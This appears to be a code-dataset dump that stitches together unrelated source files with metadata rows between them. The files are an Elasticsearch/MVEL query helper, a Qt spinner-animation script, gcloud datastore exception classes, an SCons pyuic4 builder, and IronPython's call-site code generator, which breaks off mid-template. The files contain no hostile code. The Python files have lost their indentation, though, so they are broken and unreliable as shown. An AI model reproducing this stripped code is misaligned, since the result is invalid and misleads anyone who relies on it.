RETURNS TUPLE OBJECT WITH "type" and "value" ATTRIBUTES.
"type" CAN HAVE A VALUE OF "script", "field" OR "count"
CAN USE THE constants (name, value pairs)
"""
# IF THE QUERY IS SIMPLE ENOUGH, THEN DO NOT USE TERM PACKING
edge0 = edges[0]
if len(edges) == 1 and edge0.domain.type in ["set", "default"]:
# THE TERM RETURNED WILL BE A MEMBER OF THE GIVEN SET
def temp(term):
return StructList([edge0.domain.getPartByKey(term)])
if edge0.value and MVEL.isKeyword(edge0.value):
return Struct(
field=edge0.value,
term2parts=temp
)
elif COUNT(edge0.domain.dimension.fields) == 1:
return Struct(
field=edge0.domain.dimension.fields[0],
term2parts=temp
)
elif not edge0.value and edge0.domain.partitions:
script = mvel_compiler.Parts2TermScript(edge0.domain)
return Struct(
expression=script,
term2parts=temp
)
else:
return Struct(
expression=mvel_compiler.compile_expression(edge0.value, constants),
term2parts=temp
)
mvel_terms = [] # FUNCTION TO PACK TERMS
fromTerm2Part = [] # UNPACK TERMS BACK TO PARTS
for e in edges:
domain = e.domain
fields = domain.dimension.fields
if not e.value and fields:
code, decode = mvel_compiler.Parts2Term(e.domain)
t = Struct(
toTerm=code,
fromTerm=decode
)
elif fields:
Log.error("not expected")
elif e.domain.type == "time":
t = compileTime2Term(e)
elif e.domain.type == "duration":
t = compileDuration2Term(e)
elif e.domain.type in domains.ALGEBRAIC:
t = compileNumeric2Term(e)
elif e.domain.type == "set" and not fields:
def fromTerm(term):
return e.domain.getPartByKey(term)
code, decode = mvel_compiler.Parts2Term(e.domain)
t = Struct(
toTerm=code,
fromTerm=decode
)
else:
t = compileString2Term(e)
if not t.toTerm.body:
mvel_compiler.Parts2Term(e.domain)
Log.unexpected("what?")
fromTerm2Part.append(t.fromTerm)
mvel_terms.append(t.toTerm.body)
# REGISTER THE DECODE FUNCTION
def temp(term):
terms = term.split('|')
output = StructList([t2p(t) for t, t2p in zip(terms, fromTerm2Part)])
return output
return Struct(
expression=mvel_compiler.compile_expression("+'|'+".join(mvel_terms), constants),
term2parts=temp
)
def fix_es_stats(s):
"""
ES RETURNS BAD DEFAULT VALUES FOR STATS
"""
s = wrap(s)
if s.count == 0:
return stats.zero
return s
# MAP NAME TO SQL FUNCTION
aggregates = {
"none": "none",
"one": "count",
"sum": "total",
"add": "total",
"count": "count",
"maximum": "max",
"minimum": "min",
"max": "max",
"min": "min",
"mean": "mean",
"average": "mean",
"avg": "mean",
"N": "count",
"X0": "count",
"X1": "total",
"X2": "sum_of_squares",
"std": "std_deviation",
"stddev": "std_deviation",
"var": "variance",
"variance": "variance"
}
| mpl-2.0 | 4,147,176,898,740,721,700 | 31.76 | 145 | 0.575336 | false |
dtbcoinlab/dtbcoin | share/qt/make_spinner.py | 1 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
DTC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(DTC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit | 131,144,194,758,330,020 | 23.069767 | 85 | 0.691787 | false |
Kapiche/gcloud-datastore-oem | gcloudoem/exceptions.py | 1 | 8700 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# CHANGED BY Kapiche Ltd.
# Copyright 2015 Kapiche Ltd. All rights reserved.
# Based on work by the good folk responsible for gcloud-python. Thanks folks!
#
"""
Custom exceptions.
"""
from collections import defaultdict
import json
import six
_HTTP_CODE_TO_EXCEPTION = {} # populated at end of module
class GCloudError(Exception):
"""Base error class for gcloud errors (abstract).
Each subclass represents a single type of HTTP error response.
"""
code = None
"""HTTP status code. Concrete subclasses *must* define.
See: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
"""
def __init__(self, message, errors=()):
super(GCloudError, self).__init__()
# suppress deprecation warning under 2.6.x
self.message = message
self._errors = [error.copy() for error in errors]
def __str__(self):
return '%d %s' % (self.code, self.message)
@property
def errors(self):
"""Detailed error information.
:rtype: list(dict)
:returns: a list of mappings describing each error.
"""
return [error.copy() for error in self._errors]
class Redirection(GCloudError):
"""Base for 3xx responses
This class is abstract.
"""
class MovedPermanently(Redirection):
"""Exception mapping a '301 Moved Permanently' response."""
code = 301
class NotModified(Redirection):
"""Exception mapping a '304 Not Modified' response."""
code = 304
class TemporaryRedirect(Redirection):
"""Exception mapping a '307 Temporary Redirect' response."""
code = 307
class ResumeIncomplete(Redirection):
"""Exception mapping a '308 Resume Incomplete' response."""
code = 308
class ClientError(GCloudError):
"""Base for 4xx responses
This class is abstract
"""
class BadRequest(ClientError):
"""Exception mapping a '400 Bad Request' response."""
code = 400
class Unauthorized(ClientError):
"""Exception mapping a '401 Unauthorized' response."""
code = 401
class Forbidden(ClientError):
"""Exception mapping a '403 Forbidden' response."""
code = 403
class NotFound(ClientError):
"""Exception mapping a '404 Not Found' response."""
code = 404
class MethodNotAllowed(ClientError):
"""Exception mapping a '405 Method Not Allowed' response."""
code = 405
class Conflict(ClientError):
"""Exception mapping a '409 Conflict' response."""
code = 409
class LengthRequired(ClientError):
"""Exception mapping a '411 Length Required' response."""
code = 411
class PreconditionFailed(ClientError):
"""Exception mapping a '412 Precondition Failed' response."""
code = 412
class RequestRangeNotSatisfiable(ClientError):
"""Exception mapping a '416 Request Range Not Satisfiable' response."""
code = 416
class TooManyRequests(ClientError):
"""Exception mapping a '429 Too Many Requests' response."""
code = 429
class ServerError(GCloudError):
"""Base for 5xx responses: (abstract)"""
class InternalServerError(ServerError):
"""Exception mapping a '500 Internal Server Error' response."""
code = 500
class NotImplemented(ServerError):
"""Exception mapping a '501 Not Implemented' response."""
code = 501
class ServiceUnavailable(ServerError):
"""Exception mapping a '503 Service Unavailable' response."""
code = 503
def make_exception(response, content, use_json=True):
"""
Factory: create exception based on HTTP response code.
:type response: :class:`httplib2.Response` or other HTTP response object
:param response: A response object that defines a status code as the status attribute.
:type content: string or dictionary
:param content: The body of the HTTP error response.
:type use_json: boolean
:param use_json: Flag indicating if ``content`` is expected to be JSON.
:rtype: instance of :class:`GCloudError`, or a concrete subclass.
:returns: Exception specific to the error response.
"""
message = content
errors = ()
if isinstance(content, str):
if use_json:
payload = json.loads(content)
else:
payload = {}
else:
payload = content
message = payload.get('message', message)
errors = payload.get('error', {}).get('errors', ())
try:
klass = _HTTP_CODE_TO_EXCEPTION[response.status]
except KeyError:
error = GCloudError(message, errors)
error.code = response.status
else:
error = klass(message, errors)
return error
def _walk_subclasses(klass):
"""Recursively walk subclass tree."""
for sub in klass.__subclasses__():
yield sub
for subsub in _walk_subclasses(sub):
yield subsub
# Build the code->exception class mapping.
for eklass in _walk_subclasses(GCloudError):
code = getattr(eklass, 'code', None)
if code is not None:
_HTTP_CODE_TO_EXCEPTION[code] = eklass
class ValidationError(AssertionError):
"""
Validation exception.
May represent an error validating a field or a document containing fields with validation errors.
:ivar errors: A dictionary of errors for fields within this document or list, or None if the error is for an
individual field.
"""
errors = {}
field_name = None
_message = None
def __init__(self, message="", **kwargs):
self.errors = kwargs.get('errors', {})
self.field_name = kwargs.get('field_name', None)
self.message = message
def __str__(self):
return six.text_type(self.message)
def __repr__(self):
return '%s(%s,)' % (self.__class__.__name__, self.message)
def __getattribute__(self, name):
message = super(ValidationError, self).__getattribute__(name)
if name == 'message':
if self.field_name:
message = '%s' % message
if self.errors:
message = '%s(%s)' % (message, self._format_errors())
return message
def _get_message(self):
return self._message
def _set_message(self, message):
self._message = message
message = property(_get_message, _set_message)
def to_dict(self):
"""
Returns a dictionary of all errors within a entity.
Keys are field names or list indices and values are the validation error messages, or a nested dictionary of
errors for an embedded document or list.
"""
def build_dict(source):
errors_dict = {}
if not source:
return errors_dict
if isinstance(source, dict):
for field_name, error in source.items():
errors_dict[field_name] = build_dict(error)
elif isinstance(source, ValidationError) and source.errors:
return build_dict(source.errors)
else:
return six.text_type(source)
return errors_dict
if not self.errors:
return {}
return build_dict(self.errors)
def _format_errors(self):
"""Returns a string listing all errors within a document"""
def generate_key(value, prefix=''):
if isinstance(value, list):
value = ' '.join([generate_key(k) for k in value])
if isinstance(value, dict):
value = ' '.join(
[generate_key(v, k) for k, v in value.items()])
results = "%s.%s" % (prefix, value) if prefix else value
return results
error_dict = defaultdict(list)
for k, v in self.to_dict().items():
error_dict[generate_key(v)].append(k)
return ' '.join(["%s: %s" % (k, v) for k, v in error_dict.items()])
class InvalidQueryError(Exception):
"""Invalid Datastore query."""
pass
class EnvironmentError(Exception):
"""Generally means that connect() wasn't called."""
pass
class DoesNotExist(Exception):
pass
class MultipleObjectsReturned(Exception):
pass
class ConnectionError(Exception):
pass
| apache-2.0 | -6,143,890,875,748,414,000 | 25.934985 | 116 | 0.63931 | false |
llekn/ffado | admin/pyuic4.py | 1 | 1532 | #!/usr/bin/python
#
# Copyright (C) 2007-2008 Arnold Krille
#
# This file is part of FFADO
# FFADO = Free Firewire (pro-)audio drivers for linux
#
# FFADO is based upon FreeBoB.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import imp
def pyuic4_action( target, source, env ):
env.Execute( "pyuic4 " + str( source[0] ) + " > " + str( target[0] ) )
return 0
def pyuic4_string( target, source, env ):
return "building '%s' from '%s'" % ( str(target[0]), str( source[0] ) )
def PyQt4Check( context ):
context.Message( "Checking for pyuic4 (by checking for the python module pyqtconfig) " )
ret = True
try:
imp.find_module( "pyqtconfig" )
except ImportError:
ret = False
context.Result( ret )
return ret
def generate( env, **kw ):
env['BUILDERS']['PyUIC4'] = env.Builder( action=pyuic4_action, src_suffix=".ui", single_source=True )
env['PYUIC4_TESTS'] = { "PyQt4Check" : PyQt4Check }
def exists( env ):
return 1
| gpl-2.0 | -256,141,468,672,272,600 | 29.64 | 102 | 0.706266 | false |
moto-timo/ironpython3 | Src/Scripts/generate_calls.py | 1 | 26135 | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
import sys
from generate import generate
MAX_ARGS = 16
def make_params(nargs, *prefix):
params = ["object arg%d" % i for i in range(nargs)]
return ", ".join(list(prefix) + params)
def make_params1(nargs, prefix=("CodeContext context",)):
params = ["object arg%d" % i for i in range(nargs)]
return ", ".join(list(prefix) + params)
def make_args(nargs, *prefix):
params = ["arg%d" % i for i in range(nargs)]
return ", ".join(list(prefix) + params)
def make_args1(nargs, prefix, start=0):
args = ["arg%d" % i for i in range(start, nargs)]
return ", ".join(list(prefix) + args)
def make_calltarget_type_args(nargs):
return ', '.join(['PythonFunction'] + ['object'] * (nargs + 1))
def gen_args_comma(nparams, comma):
args = ""
for i in range(nparams):
args = args + comma + ("object arg%d" % i)
comma = ", "
return args
def gen_args(nparams):
return gen_args_comma(nparams, "")
def gen_args_call(nparams, *prefix):
args = ""
comma = ""
for i in range(nparams):
args = args + comma +("arg%d" % i)
comma = ", "
if prefix:
if args:
args = prefix[0] + ', ' + args
else:
args = prefix[0]
return args
def gen_args_array(nparams):
args = gen_args_call(nparams)
if args: return "{ " + args + " }"
else: return "{ }"
def gen_callargs(nparams):
args = ""
comma = ""
for i in range(nparams):
args = args + comma + ("callArgs[%d]" % i)
comma = ","
return args
def gen_args_paramscall(nparams):
args = ""
comma = ""
for i in range(nparams):
args = args + comma + ("args[%d]" % i)
comma = ","
return args
method_caller_template = """
class MethodBinding<%(typeParams)s> : BaseMethodBinding {
private CallSite<Func<CallSite, CodeContext, object, object, %(typeParams)s, object>> _site;
public MethodBinding(PythonInvokeBinder binder) {
_site = CallSite<Func<CallSite, CodeContext, object, object, %(typeParams)s, object>>.Create(binder);
}
public object SelfTarget(CallSite site, CodeContext context, object target, %(callParams)s) {
Method self = target as Method;
if (self != null && self._inst != null) {
return _site.Target(_site, context, self._func, self._inst, %(callArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, target, %(callArgs)s);
}
public object SelflessTarget(CallSite site, CodeContext context, object target, object arg0, %(callParamsSelfless)s) {
Method self = target as Method;
if (self != null && self._inst == null) {
return _site.Target(_site, context, self._func, PythonOps.MethodCheckSelf(context, self, arg0), %(callArgsSelfless)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, object, %(typeParams)s, object>>)site).Update(site, context, target, arg0, %(callArgsSelfless)s);
}
public override Delegate GetSelfTarget() {
return new Func<CallSite, CodeContext, object, %(typeParams)s, object>(SelfTarget);
}
public override Delegate GetSelflessTarget() {
return new Func<CallSite, CodeContext, object, object, %(typeParams)s, object>(SelflessTarget);
}
}"""
def method_callers(cw):
for nparams in range(1, MAX_ARGS-3):
cw.write(method_caller_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams': ', '.join(('T%d arg%d' % (d,d) for d in range(nparams))),
'callParamsSelfless': ', '.join(('T%d arg%d' % (d,d+1) for d in range(nparams))),
'callArgsSelfless' : ', '.join(('arg%d' % (d+1) for d in range(nparams))),
'argCount' : nparams,
'callArgs': ', '.join(('arg%d' % d for d in range(nparams))),
'genFuncArgs' : make_calltarget_type_args(nparams),
})
def selfless_method_caller_switch(cw):
cw.enter_block('switch (typeArgs.Length)')
for i in range(1, MAX_ARGS-3):
cw.write('case %d: binding = (BaseMethodBinding)Activator.CreateInstance(typeof(MethodBinding<%s>).MakeGenericType(typeArgs), binder); break;' % (i, ',' * (i-1)))
cw.exit_block()
function_caller_template = """
public sealed class FunctionCaller<%(typeParams)s> : FunctionCaller {
public FunctionCaller(int compat) : base(compat) { }
public object Call%(argCount)d(CallSite site, CodeContext context, object func, %(callParams)s) {
PythonFunction pyfunc = func as PythonFunction;
if (pyfunc != null && pyfunc._compat == _compat) {
return ((Func<%(genFuncArgs)s>)pyfunc.__code__.Target)(pyfunc, %(callArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, func, %(callArgs)s);
}"""
defaults_template = """
public object Default%(defaultCount)dCall%(argCount)d(CallSite site, CodeContext context, object func, %(callParams)s) {
PythonFunction pyfunc = func as PythonFunction;
if (pyfunc != null && pyfunc._compat == _compat) {
int defaultIndex = pyfunc.Defaults.Length - pyfunc.NormalArgumentCount + %(argCount)d;
return ((Func<%(genFuncArgs)s>)pyfunc.__code__.Target)(pyfunc, %(callArgs)s, %(defaultArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, func, %(callArgs)s);
}"""
defaults_template_0 = """
public object Default%(argCount)dCall0(CallSite site, CodeContext context, object func) {
PythonFunction pyfunc = func as PythonFunction;
if (pyfunc != null && pyfunc._compat == _compat) {
int defaultIndex = pyfunc.Defaults.Length - pyfunc.NormalArgumentCount;
return ((Func<%(genFuncArgs)s>)pyfunc.__code__.Target)(pyfunc, %(defaultArgs)s);
}
return ((CallSite<Func<CallSite, CodeContext, object, object>>)site).Update(site, context, func);
}"""
def function_callers(cw):
cw.write('''class FunctionCallerProperties {
internal const int MaxGeneratedFunctionArgs = %d;
}''' % (MAX_ARGS-2))
cw.write('')
for nparams in range(1, MAX_ARGS-2):
cw.write(function_caller_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams': ', '.join(('T%d arg%d' % (d,d) for d in range(nparams))),
'argCount' : nparams,
'callArgs': ', '.join(('arg%d' % d for d in range(nparams))),
'genFuncArgs' : make_calltarget_type_args(nparams),
})
for i in range(nparams + 1, MAX_ARGS - 2):
cw.write(defaults_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams': ', '.join(('T%d arg%d' % (d,d) for d in range(nparams))),
'argCount' : nparams,
'totalParamCount' : i,
'callArgs': ', '.join(('arg%d' % d for d in range(nparams))),
'defaultCount' : i - nparams,
'defaultArgs' : ', '.join(('pyfunc.Defaults[defaultIndex + %d]' % curDefault for curDefault in range(i - nparams))),
'genFuncArgs' : make_calltarget_type_args(i),
})
cw.write('}')
def function_callers_0(cw):
for i in range(1, MAX_ARGS - 2):
cw.write(defaults_template_0 % {
'argCount' : i,
'defaultArgs' : ', '.join(('pyfunc.Defaults[defaultIndex + %d]' % curDefault for curDefault in range(i))),
'genFuncArgs' : make_calltarget_type_args(i),
})
function_caller_switch_template = """case %(argCount)d:
callerType = typeof(FunctionCaller<%(arity)s>).MakeGenericType(typeParams);
mi = callerType.GetMethod(baseName + "Call%(argCount)d");
Debug.Assert(mi != null);
fc = GetFunctionCaller(callerType, funcCompat);
funcType = typeof(Func<,,,,%(arity)s>).MakeGenericType(allParams);
return new Binding.FastBindResult<T>((T)(object)mi.CreateDelegate(funcType, fc), true);"""
def function_caller_switch(cw):
for nparams in range(1, MAX_ARGS-2):
cw.write(function_caller_switch_template % {
'arity' : ',' * (nparams - 1),
'argCount' : nparams,
})
def gen_lazy_call_targets(cw):
for nparams in range(MAX_ARGS):
cw.enter_block("public static object OriginalCallTarget%d(%s)" % (nparams, make_params(nparams, "PythonFunction function")))
cw.write("function.__code__.LazyCompileFirstTarget(function);")
cw.write("return ((Func<%s>)function.__code__.Target)(%s);" % (make_calltarget_type_args(nparams), gen_args_call(nparams, 'function')))
cw.exit_block()
cw.write('')
def gen_recursion_checks(cw):
for nparams in range(MAX_ARGS):
cw.enter_block("internal class PythonFunctionRecursionCheck%d" % (nparams, ))
cw.write("private readonly Func<%s> _target;" % (make_calltarget_type_args(nparams), ))
cw.write('')
cw.enter_block('public PythonFunctionRecursionCheck%d(Func<%s> target)' % (nparams, make_calltarget_type_args(nparams)))
cw.write('_target = target;')
cw.exit_block()
cw.write('')
cw.enter_block('public object CallTarget(%s)' % (make_params(nparams, "PythonFunction/*!*/ function"), ))
cw.write('PythonOps.FunctionPushFrame((PythonContext)function.Context.LanguageContext);')
cw.enter_block('try')
cw.write('return _target(%s);' % (gen_args_call(nparams, 'function'), ))
cw.finally_block()
cw.write('PythonOps.FunctionPopFrame();')
cw.exit_block()
cw.exit_block()
cw.exit_block()
cw.write('')
def gen_recursion_delegate_switch(cw):
for nparams in range(MAX_ARGS):
cw.case_label('case %d:' % nparams)
cw.write('finalTarget = new Func<%s>(new PythonFunctionRecursionCheck%d((Func<%s>)finalTarget).CallTarget);' % (make_calltarget_type_args(nparams), nparams, make_calltarget_type_args(nparams)))
cw.write('break;')
cw.dedent()
def get_call_type(postfix):
if postfix == "": return "CallType.None"
else: return "CallType.ImplicitInstance"
def make_call_to_target(cw, index, postfix, extraArg):
cw.enter_block("public override object Call%(postfix)s(%(params)s)", postfix=postfix,
params=make_params1(index))
cw.write("if (target%(index)d != null) return target%(index)d(%(args)s);", index=index,
args = make_args1(index, extraArg))
cw.write("throw BadArgumentError(%(callType)s, %(nargs)d);", callType=get_call_type(postfix), nargs=index)
cw.exit_block()
def make_call_to_targetX(cw, index, postfix, extraArg):
cw.enter_block("public override object Call%(postfix)s(%(params)s)", postfix=postfix,
params=make_params1(index))
cw.write("return target%(index)d(%(args)s);", index=index, args = make_args1(index, extraArg))
cw.exit_block()
def make_error_calls(cw, index):
cw.enter_block("public override object Call(%(params)s)", params=make_params1(index))
cw.write("throw BadArgumentError(CallType.None, %(nargs)d);", nargs=index)
cw.exit_block()
if index > 0:
cw.enter_block("public override object CallInstance(%(params)s)", params=make_params1(index))
cw.write("throw BadArgumentError(CallType.ImplicitInstance, %(nargs)d);", nargs=index)
cw.exit_block()
def gen_call(nargs, nparams, cw, extra=[]):
args = extra + ["arg%d" % i for i in range(nargs)]
cw.enter_block("public override object Call(%s)" % make_params1(nargs))
# first emit error checking...
ndefaults = nparams-nargs
if nargs != nparams:
cw.write("if (Defaults.Length < %d) throw BadArgumentError(%d);" % (ndefaults,nargs))
# emit the common case of no recursion check
if (nargs == nparams):
cw.write("if (!EnforceRecursion) return target(%s);" % ", ".join(args))
else:
dargs = args + ["Defaults[Defaults.Length - %d]" % i for i in range(ndefaults, 0, -1)]
cw.write("if (!EnforceRecursion) return target(%s);" % ", ".join(dargs))
# emit non-common case of recursion check
cw.write("PushFrame();")
cw.enter_block("try")
# make function body
if (nargs == nparams):
cw.write("return target(%s);" % ", ".join(args))
else:
dargs = args + ["Defaults[Defaults.Length - %d]" % i for i in range(ndefaults, 0, -1)]
cw.write("return target(%s);" % ", ".join(dargs))
cw.finally_block()
cw.write("PopFrame();")
cw.exit_block()
cw.exit_block()
def gen_params_callN(cw, any):
cw.enter_block("public override object Call(CodeContext context, params object[] args)")
cw.write("if (!IsContextAware) return Call(args);")
cw.write("")
cw.enter_block("if (Instance == null)")
cw.write("object[] newArgs = new object[args.Length + 1];")
cw.write("newArgs[0] = context;")
cw.write("Array.Copy(args, 0, newArgs, 1, args.Length);")
cw.write("return Call(newArgs);")
cw.else_block()
# need to call w/ Context, Instance, *args
if any:
cw.enter_block("switch (args.Length)")
for i in range(MAX_ARGS-1):
if i == 0:
cw.write(("case %d: if(target2 != null) return target2(context, Instance); break;") % (i))
else:
cw.write(("case %d: if(target%d != null) return target%d(context, Instance, " + gen_args_paramscall(i) + "); break;") % (i, i+2, i+2))
cw.exit_block()
cw.enter_block("if (targetN != null)")
cw.write("object [] newArgs = new object[args.Length+2];")
cw.write("newArgs[0] = context;")
cw.write("newArgs[1] = Instance;")
cw.write("Array.Copy(args, 0, newArgs, 2, args.Length);")
cw.write("return targetN(newArgs);")
cw.exit_block()
cw.write("throw BadArgumentError(args.Length);")
cw.exit_block()
else:
cw.write("object [] newArgs = new object[args.Length+2];")
cw.write("newArgs[0] = context;")
cw.write("newArgs[1] = Instance;")
cw.write("Array.Copy(args, 0, newArgs, 2, args.Length);")
cw.write("return target(newArgs);")
cw.exit_block()
cw.exit_block()
cw.write("")
CODE = """
public static object Call(%(params)s) {
FastCallable fc = func as FastCallable;
if (fc != null) return fc.Call(%(args)s);
return PythonCalls.Call(func, %(argsArray)s);
}"""
def gen_python_switch(cw):
for nparams in range(MAX_ARGS):
genArgs = make_calltarget_type_args(nparams)
cw.write("""case %d:
originalTarget = (Func<%s>)OriginalCallTarget%d;
return typeof(Func<%s>);""" % (nparams, genArgs, nparams, genArgs))
fast_type_call_template = """
class FastBindingBuilder<%(typeParams)s> : FastBindingBuilderBase {
public FastBindingBuilder(CodeContext context, PythonType type, PythonInvokeBinder binder, Type siteType, Type[] genTypeArgs) :
base(context, type, binder, siteType, genTypeArgs) {
}
protected override Delegate GetNewSiteDelegate(PythonInvokeBinder binder, object func) {
return new Func<%(newInitDlgParams)s>(new NewSite<%(typeParams)s>(binder, func).Call);
}
protected override Delegate MakeDelegate(int version, Delegate newDlg, LateBoundInitBinder initBinder) {
return new Func<%(funcParams)s>(
new FastTypeSite<%(typeParams)s>(
version,
(Func<%(newInitDlgParams)s>)newDlg,
initBinder
).CallTarget
);
}
}
class FastTypeSite<%(typeParams)s> {
private readonly int _version;
private readonly Func<%(newInitDlgParams)s> _new;
private readonly CallSite<Func<%(nestedSlowSiteParams)s>> _initSite;
public FastTypeSite(int version, Func<%(newInitDlgParams)s> @new, LateBoundInitBinder initBinder) {
_version = version;
_new = @new;
_initSite = CallSite<Func<%(nestedSlowSiteParams)s>>.Create(initBinder);
}
public object CallTarget(CallSite site, CodeContext context, object type, %(callTargetArgs)s) {
PythonType pt = type as PythonType;
if (pt != null && pt.Version == _version) {
object res = _new(context, type, %(callTargetPassedArgs)s);
_initSite.Target(_initSite, context, res, %(callTargetPassedArgs)s);
return res;
}
return ((CallSite<Func<%(funcParams)s>>)site).Update(site, context, type, %(callTargetPassedArgs)s);
}
}
class NewSite<%(typeParams)s> {
private readonly CallSite<Func<%(nestedSiteParams)s>> _site;
private readonly object _target;
public NewSite(PythonInvokeBinder binder, object target) {
_site = CallSite<Func<%(nestedSiteParams)s>>.Create(binder);
_target = target;
}
public object Call(CodeContext context, object typeOrInstance, %(callTargetArgs)s) {
return _site.Target(_site, context, _target, typeOrInstance, %(callTargetPassedArgs)s);
}
}
"""
def gen_fast_type_callers(cw):
for nparams in range(1, 6):
funcParams = 'CallSite, CodeContext, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
newInitDlgParams = 'CodeContext, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
callTargetArgs = ', '.join(('T%d arg%d' % (d, d) for d in range(nparams)))
callTargetPassedArgs = ', '.join(('arg%d' % (d, ) for d in range(nparams)))
nestedSiteParams = 'CallSite, CodeContext, object, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
nestedSlowSiteParams = 'CallSite, CodeContext, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
cw.write(fast_type_call_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'funcParams' : funcParams,
'newInitDlgParams' : newInitDlgParams,
'callTargetArgs' : callTargetArgs,
'callTargetPassedArgs': callTargetPassedArgs,
'nestedSiteParams' : nestedSiteParams,
'nestedSlowSiteParams' : nestedSlowSiteParams,
})
def gen_fast_type_caller_switch(cw):
for nparams in range(1, 6):
cw.write('case %d: baseType = typeof(FastBindingBuilder<%s>); break;' % (nparams, (',' * (nparams - 1))))
fast_init_template = """
class FastInitSite<%(typeParams)s> {
private readonly int _version;
private readonly PythonFunction _slot;
private readonly CallSite<Func<CallSite, CodeContext, PythonFunction, object, %(typeParams)s, object>> _initSite;
public FastInitSite(int version, PythonInvokeBinder binder, PythonFunction target) {
_version = version;
_slot = target;
_initSite = CallSite<Func<CallSite, CodeContext, PythonFunction, object, %(typeParams)s, object>>.Create(binder);
}
public object CallTarget(CallSite site, CodeContext context, object inst, %(callParams)s) {
IPythonObject pyObj = inst as IPythonObject;
if (pyObj != null && pyObj.PythonType.Version == _version) {
_initSite.Target(_initSite, context, _slot, inst, %(callArgs)s);
return inst;
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, inst, %(callArgs)s);
}
public object EmptyCallTarget(CallSite site, CodeContext context, object inst, %(callParams)s) {
IPythonObject pyObj = inst as IPythonObject;
if ((pyObj != null && pyObj.PythonType.Version == _version) || DynamicHelpers.GetPythonType(inst).Version == _version) {
return inst;
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, inst, %(callArgs)s);
}
}
"""
MAX_FAST_INIT_ARGS = 6
def gen_fast_init_callers(cw):
for nparams in range(1, MAX_FAST_INIT_ARGS):
callParams = ', '.join(('T%d arg%d' % (d, d) for d in range(nparams)))
callArgs = ', '.join(('arg%d' % (d, ) for d in range(nparams)))
cw.write(fast_init_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams' : callParams,
'callArgs': callArgs,
})
def gen_fast_init_switch(cw):
for nparams in range(1, MAX_FAST_INIT_ARGS):
cw.write("case %d: initSiteType = typeof(FastInitSite<%s>); break;" % (nparams, ',' * (nparams-1), ))
def gen_fast_init_max_args(cw):
cw.write("public const int MaxFastLateBoundInitArgs = %d;" % MAX_FAST_INIT_ARGS)
MAX_INSTRUCTION_PROVIDED_CALLS = 7
def gen_call_expression_instruction_switch(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
cw.case_label('case %d:' % i)
cw.write('compiler.Compile(Parent.LocalContext);')
cw.write('compiler.Compile(_target);')
for j in range(i):
cw.write('compiler.Compile(_args[%d].Expression);' % j)
cw.write('compiler.Instructions.Emit(new Invoke%dInstruction(Parent.PyContext));' % i)
cw.write('return;')
cw.dedent()
def gen_call_expression_instructions(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
siteargs = 'object, ' * (i + 1)
argfetch = '\n'.join([' var arg%d = frame.Pop();' % (j-1) for j in range(i, 0, -1)])
callargs = ', '.join(['target'] + ['arg%d' % j for j in range(i)])
cw.write("""
class Invoke%(argcount)dInstruction : InvokeInstruction {
private readonly CallSite<Func<CallSite, CodeContext, %(siteargs)sobject>> _site;
public Invoke%(argcount)dInstruction(PythonContext context) {
_site = context.CallSite%(argcount)d;
}
public override int ConsumedStack {
get {
